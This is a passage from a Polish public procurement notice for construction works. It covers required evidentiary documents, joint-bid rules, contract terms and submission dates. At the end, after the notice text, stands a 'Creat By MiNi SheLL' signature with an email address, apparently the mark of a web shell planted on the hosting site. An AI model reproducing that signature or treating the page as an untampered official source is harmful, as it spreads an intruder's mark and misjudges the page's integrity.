kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów (t.j.Dz. U. z 2024 r. poz. 1616.), z innym wykonawcą, który złożył odrębną ofertę, albo oświadczenia o przynależności do tej samej grupy kapitałowej wraz z dokumentami lub informacjami potwierdzającymi przygotowanie oferty, niezależnie od innego wykonawcy należącego do tej samej grupy kapitałowej <br/>(wg załącznika nr 7),<br/>Zamawiający żąda od wykonawcy, który polega na zdolnościach technicznych lub zawodowych lub sytuacji finansowej lub ekonomicznej podmiotów udostępniających zasoby na zasadach określonych w art. 118 ustawy, przedstawienia podmiotowych środków dowodowych, o których mowa w ppkt. 1 – 2) dotyczących tych podmiotów, potwierdzających, że nie zachodzą wobec tych podmiotów podstawy wykluczenia z postępowania.</span> </h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">2.	W celu potwierdzenia spełniania przez wykonawcę warunków udziału w postępowaniu dotyczących zdolności technicznej lub zawodowej, sytuacji finansowej, Zamawiający żąda następujących podmiotowych środków dowodowych :<br/>1)	wykazu robót budowlanych wykonanych nie wcześniej niż w okresie ostatnich 5 lat, a jeżeli okres prowadzenia działalności jest krótszy – w tym okresie, wraz z podaniem ich rodzaju, wartości, daty i miejsca wykonania oraz podmiotów, na rzecz których roboty te zostały wykonane, oraz załączeniem dowodów określających, czy te roboty budowlane lub usługi zostały wykonane należycie, przy czym dowodami, o których mowa,<br/> są referencje bądź inne dokumenty sporządzone przez podmiot, na rzecz którego roboty budowlane lub usługi zostały wykonane, a jeżeli wykonawca z przyczyn niezależnych od niego nie jest w stanie uzyskać tych dokumentów – inne odpowiednie dokumenty<br/> ( wg załącznika Nr 4 ),<br/>2)	wykazu osób, skierowanych przez wykonawcę do realizacji zamówienia publicznego, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, uprawnień, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia publicznego, a także zakresu wykonywanych przez nie czynności oraz informacją <br/>o podstawie do dysponowania tymi osobami ( wg załącznika Nr 5 ),<br/>3)	informacji banku lub spółdzielczej kasy oszczędnościowo-kredytowej potwierdzającej wysokość posiadanych środków finansowych lub zdolność kredytową wykonawcy, <br/>w okresie nie wcześniejszym niż 3 miesiące przed jej złożeniem;</span> </h3> <h3 class="mb-0">5.8.) Wykaz przedmiotowych środków dowodowych: </h3> Zamawiający nie żąda przedmiotowych środków dowodowych <h3 class="mb-0">5.9.) Zamawiający przewiduje uzupełnienie przedmiotowych środków dowodowych: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> 6.	Wykonawcy wspólnie ubiegający się o udzielenie zamówienia :<br/>1) wspólnie muszą wykazać, że wspólnie spełniają warunki udziału w postępowaniu,<br/>2)	w stosunku do żadnego z nich nie zachodzi jakakolwiek podstawa do wykluczenia <br/>z postępowania na podstawie art. 108 ust. 1 oraz oraz art. 109 ust. 1 pkt. 4, ustawy Pzp, oraz art. 7 ust. 1 ustawy z dnia 13 kwietnia 2022 r. o szczególnych rozwiązaniach w zakresie przeciwdziałania wspieraniu agresji na Ukrainę oraz służących ochronie bezpieczeństwa narodowego (t.j. Dz. U. z 2025 r. poz. 514),<br/>3) ponoszą solidarną odpowiedzialność za niewykonanie lub nienależyte wykonanie zobowiązania,<br/>4)	muszą ustanowić pełnomocnika wykonawców występujących wspólnie do reprezentowania ich w postępowaniu o udzielenie zamówienia publicznego albo reprezentowania w postępowaniu i zawarcia umowy w sprawie zamówienia. Pełnomocnictwo musi mieć formę pisemną lub kopię potwierdzona przez notariusza,<br/>5) przed zawarciem umowy o niniejsze zamówienie publiczne, jeżeli oferta konsorcjum zostanie wybrana jako najkorzystniejsza, Zamawiający wezwie do przedstawienia umowy regulującej współpracę tych wykonawców,<br/>6)	wykonawcy wspólnie ubiegający się o udzielenie zamówienia mają obowiązek dołączyć do oferty oświadczenie, z którego będzie wynikać, jakie roboty budowlane wykonają poszczególni wykonawcy,<br/>7)	przepisy dotyczące wykonawcy stosuje się odpowiednio do wykonawców wspólnie ubiegających się o udzielenie zamówienia <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> Wszelkie informacje znajdują się w rozdziale XXI SWZ <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.6.) Zamawiający przewiduje następujące wymagania związane z realizacją zamówienia: </h3> <p class="mb-0">w zakresie zatrudnienia na podstawie stosunku pracy, w okolicznościach, o których mowa w art. 95 ustawy</p> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2025-07-02 11:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">Ofertę wraz z załącznikami należy złożyć za pośrednictwem Platformy na adres : https://ezamowienia.gov.pl</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2025-07-02 11:15</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal">do 2025-07-31</span></h3> <h3 class="mb-0">8.5.) Zamawiający przewiduje wybór najkorzystniejszej oferty z możliwością negocjacji: <span class="normal">Tak</span></h3>

Creat By MiNi SheLL
Email: jattceo@gmail.com